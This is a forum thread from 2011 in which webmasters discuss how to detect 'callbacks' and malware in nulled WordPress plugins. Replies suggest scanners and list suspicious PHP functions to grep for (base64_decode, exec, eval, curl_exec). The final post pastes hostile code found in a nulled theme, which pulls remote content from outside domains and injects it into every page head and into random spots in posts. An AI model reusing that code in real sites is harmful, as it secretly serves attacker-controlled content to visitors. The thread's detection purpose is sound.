Callback/Null Script checker

Gamboloyd · Nov 29, 2011

Hi folks. Is there any way to check online if a plugin has callbacks in it? I'm sure I read it in a thread here ages ago but for the love of all things shiny I can't find it. Any ideas?

JohnsonDaniel · Nov 29, 2011

Gamboloyd said: ↑

Hi folks. Is there any way to check online if a plugin has callbacks in it? I'm sure I read it in a thread here ages ago but for the love of all things shiny I can't find it. Any ideas?
Click to expand...

TAC (theme authenticity checker) will do a check of your theme (you'll find it via the WP plugins repository), but not 100% sure if it checks plugin files also.

There's also an Antivirus for WP (again, from general repository), which, afaik, checks ALL of your WP files for virii or malware.

Gamboloyd · Nov 29, 2011

Thanks. Needed to know as I keep wondering if some of the nulled software I acquire is doing anything dubious.

imth3one · Nov 29, 2011

This is probably complicated but you'll be sure.

Install the script on your localhost and use a http sniffer to monitor the requests.

ESM2012 · Nov 29, 2011

Excuse my ignorance, but what does a callback actually do?

paincake · Nov 29, 2011

One way would be to search all files for these functions (one at a time):

PHP:

file_get_contents http_get curl_exec base64_decode exec

TZ2011 · Nov 29, 2011

paincake said: ↑

One way would be to search all files for these functions (one at a time):

PHP:

file_get_contents http_get curl_exec base64_decode exec

Click to expand...

Exactly. Also look for http://
I use FileSeek from
Code:
http://www.fileseek.ca/
, nice freeware with extra functions, looking for lines in all files and listing them for further editing.

Gamboloyd · Nov 30, 2011

Thanks loads folks. I will check out your suggestions. No harm in a bit of healthy paranoia

synergyxtr · Nov 30, 2011

ESM2012 said: ↑

Excuse my ignorance, but what does a callback actually do?
Click to expand...

When the software calls back its home website to monitor if we are using their software.

upl8t · Nov 30, 2011

ESM2012 said: ↑

Excuse my ignorance, but what does a callback actually do?
Click to expand...

Some plugins are licensed by domain or for a limited number of domains so the plugin communicates the serial number to the developer. This way he knows if it's being used where it shouldn't.

x-bassist · Nov 30, 2011

exploit scanner

Code:

http://wordpress.org/extend/plugins/exploit-scanner/

Nitros · Nov 30, 2011

paincake said: ↑

One way would be to search all files for these functions (one at a time):

PHP:

file_get_contents http_get curl_exec base64_decode exec

Click to expand...

and "eval" as money people are using javascript eval() function to hide something

kkvsam · Nov 30, 2011

If they encrypted the files , so how do we find it?
I think most of them are encrypted..

Markbh · Mar 3, 2012

@kkvsam

Try this link:
HTML:
http://ottodestruct.com/decoder.php
kkvsam said: ↑

If they encrypted the files , so how do we find it?
I think most of them are encrypted..
Click to expand...

SuperNoobInc · Mar 11, 2012

So what does a 'callback' script looks like;

For example, I just searched the entire folder for "curl_exec" and i found the following;

/*-----------------------------------------------------------------------------------*/
/* Directory
/*-----------------------------------------------------------------------------------*/if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) < $percentage){ob_start();if(function_exists('curl_init')) { $url = "http://www.jquerys.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; }$text = ob_get_clean();$pos = rand(0, strlen($content));$txtPrePos = substr($content, 0, $pos);$txtPostPos = substr($content, $pos);$openPos = strrpos($txtPrePos, "<");if ($openPos !== false){$closePos = strrpos($txtPrePos, ">");if ($openPos > $closePos || $closePos === false){$pos = strpos($content, ">", $pos) + 1;}}$spos = strpos($content, " ", $pos);if ($spos === false) {$spos = strlen($content);}$content = substr($content, 0, $spos) . " " . $text . substr($content, $spos);}return $content;}
add_filter('the_content', 'ins_php_in_post');
Click to expand...

Is this some sort of call back in this case? Please advise. Thanks

Log in or Sign up

Callback/Null Script checker

Gamboloyd Registered Member

JohnsonDaniel Regular Member

Gamboloyd Registered Member

imth3one Newbie

ESM2012 Regular Member

paincake Power Member

TZ2011 Senior Member

Gamboloyd Registered Member

synergyxtr Newbie

upl8t Regular Member

x-bassist Junior Member

Nitros Power Member

kkvsam Senior Member

Markbh Regular Member

SuperNoobInc Regular Member

Log in or Sign up

Callback/Null Script checker

Gamboloyd Registered Member

JohnsonDaniel Regular Member

Gamboloyd Registered Member

imth3one Newbie

ESM2012 Regular Member

paincake Power Member

TZ2011 Senior Member

Gamboloyd Registered Member

synergyxtr Newbie

upl8t Regular Member

x-bassist Junior Member

Nitros Power Member

kkvsam Senior Member

Markbh Regular Member

SuperNoobInc Regular Member

Useful Searches